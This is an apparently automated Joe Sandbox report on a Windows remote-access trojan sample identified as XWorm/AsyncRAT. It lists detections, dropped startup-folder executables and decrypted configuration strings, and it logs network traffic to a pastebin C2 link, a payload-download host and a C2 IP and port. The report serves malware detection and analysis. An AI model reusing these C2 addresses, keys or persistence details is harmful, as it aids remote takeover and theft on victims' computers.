                        Antivirus detection for dropped file
                        Source: C:\Users\Public\Runtime BrokerAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]Avira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Found malware configuration
                        Source: 00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/LsuynkUz", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\Public\Runtime BrokerReversingLabs: Detection: 81%
                        Source: C:\Users\Public\Runtime BrokerVirustotal: Detection: 65%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]ReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]Virustotal: Detection: 65%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeVirustotal: Detection: 65%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: 80BvHOM51j.exeVirustotal: Detection: 9%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\Public\Runtime BrokerJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackString decryptor: https://pastebin.com/raw/LsuynkUz
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackString decryptor: <123456789>
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackString decryptor: <Xwormmm>
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackString decryptor: Stellar
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackString decryptor: USB.exe
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackString decryptor: %Public%
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpackString decryptor: Runtime Broker
                        Source: unknownHTTPS traffic detected: 143.178.83.216:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49831 version: TLS 1.2
                        Source: 80BvHOM51j.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://pastebin.com/raw/LsuynkUz
                        Connects to a pastebin service (likely for C&C)
                        Source: unknownDNS query: name: pastebin.com
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.coonfart.exe.a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1], type: DROPPED
                        Source: Yara matchFile source: C:\Users\Public\Runtime Broker, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, type: DROPPED
                        Source: global trafficTCP traffic: 192.168.2.4:49869 -> 193.161.193.99:46070
                        Source: global trafficHTTP traffic detected: GET /raw/LsuynkUz HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 193.161.193.99 193.161.193.99
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: unknownDNS query: name: ip-api.com
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49731 -> 143.178.83.216:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49730 -> 143.178.83.216:443
                        Source: global trafficHTTP traffic detected: GET /f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622 HTTP/1.1User-Agent: Mozilla/5.0Host: bin.homebots.ioCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622 HTTP/1.1User-Agent: Mozilla/5.0Host: bin.homebots.ioCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.161.193.99
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE826F6 InternetOpenA,InternetOpenUrlA,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,InternetReadFile,InternetCloseHandle,InternetCloseHandle,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,0_2_00007FF6ACE826F6
                        Source: global trafficHTTP traffic detected: GET /f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622 HTTP/1.1User-Agent: Mozilla/5.0Host: bin.homebots.ioCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622 HTTP/1.1User-Agent: Mozilla/5.0Host: bin.homebots.ioCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /raw/LsuynkUz HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: bin.homebots.io
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: pastebin.com
                        Source: svchost.exe, 0000001A.00000002.2913557497.000001A4D6000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: svchost.exe, 0000001A.00000003.2517348187.000001A4D5E08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                        Source: edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: svchost.exe, 0000001A.00000003.2517348187.000001A4D5E08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: svchost.exe, 0000001A.00000003.2517348187.000001A4D5E08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                        Source: svchost.exe, 0000001A.00000003.2517348187.000001A4D5E3D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: edb.log.26.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: 80BvHOM51j.exe, 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, 80BvHOM51j.exe, 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, 80BvHOM51j.exe, 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, coonfart.exe, 00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, coonfart.exe, 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, coonfart.exe, 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, Runtime Broker.2.dr, 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, coonfart.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000006.00000002.1844678858.0000021358544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945912327.00000240CC0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2099020934.000001823F812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000006.00000002.1821832936.00000213486FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1891461405.00000240BC27A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002606468.000001822F9C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: coonfart.exe, 00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1821832936.00000213484D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1891461405.00000240BC051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002606468.000001822F7B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2167775470.000001BC27681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000006.00000002.1821832936.00000213486FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1891461405.00000240BC27A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002606468.000001822F9C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 0000000C.00000002.1965699235.00000240D46E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cVf6
                        Source: powershell.exe, 0000000C.00000002.1965699235.00000240D4733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000006.00000002.1821832936.00000213484D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1891461405.00000240BC051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002606468.000001822F7B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2167775470.000001BC27681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: 80BvHOM51j.exe, 00000000.00000002.2909568930.000001EE09EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bin.homebots.io/
                        Source: 80BvHOM51j.exe, 00000000.00000002.2908643707.0000009576EF7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bin.homebots.io/f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622
                        Source: 80BvHOM51j.exe, 00000000.00000002.2909568930.000001EE09EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bin.homebots.io/f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622#
                        Source: 80BvHOM51j.exe, 00000000.00000002.2909568930.000001EE09E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bin.homebots.io/f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc8756225
                        Source: powershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: 80BvHOM51j.exeString found in binary or memory: https://discord.gift/
                        Source: 80BvHOM51j.exeString found in binary or memory: https://discord.gift/cls
                        Source: svchost.exe, 0000001A.00000003.2517348187.000001A4D5EB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                        Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                        Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                        Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                        Source: svchost.exe, 0000001A.00000003.2517348187.000001A4D5EB2000.00000004.00000800.00020000.00000000.sdmp, edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                        Source: powershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000006.00000002.1844678858.0000021358544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945912327.00000240CC0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2099020934.000001823F812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: svchost.exe, 0000001A.00000003.2517348187.000001A4D5EB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                        Source: edb.log.26.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                        Source: Runtime Broker, 00000017.00000002.2438375637.00000000031AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/LsuynkUz
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                        Source: unknownHTTPS traffic detected: 143.178.83.216:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49831 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: Process Memory Space: coonfart.exe PID: 4320, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE81520 system,SetConsoleTitleW,GetStdHandle,GetStdHandle,GetConsoleScreenBufferInfo,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetStdHandle,GetConsoleScreenBufferInfo,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,_invalid_parameter_noinfo_noreturn,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SetConsoleTextAttribute,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z,SetConsoleTextAttribute,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,?fail@ios_base@std@@QEBA_NXZ,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,Sleep,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,_time64,srand,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,_invalid_parameter_noinfo_noreturn,memcpy,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,GetAsyncKeyState,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,SetConsoleTextAttribute,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,Sleep,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,0_2_00007FF6ACE81520

                        Operating System Destruction

                        barindex
                        Protects its processes via BreakOnTermination flag
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: sslproxydump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.2.coonfart.exe.12d61a78.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.0.coonfart.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1], type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\Public\Runtime Broker, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE815200_2_00007FF6ACE81520
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE82C600_2_00007FF6ACE82C60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 2_2_00007FFD9BAA23E12_2_00007FFD9BAA23E1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 2_2_00007FFD9BAA16D92_2_00007FFD9BAA16D9
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 2_2_00007FFD9BAA6EC22_2_00007FFD9BAA6EC2
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 2_2_00007FFD9BAA61162_2_00007FFD9BAA6116
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 2_2_00007FFD9BAA48ED2_2_00007FFD9BAA48ED
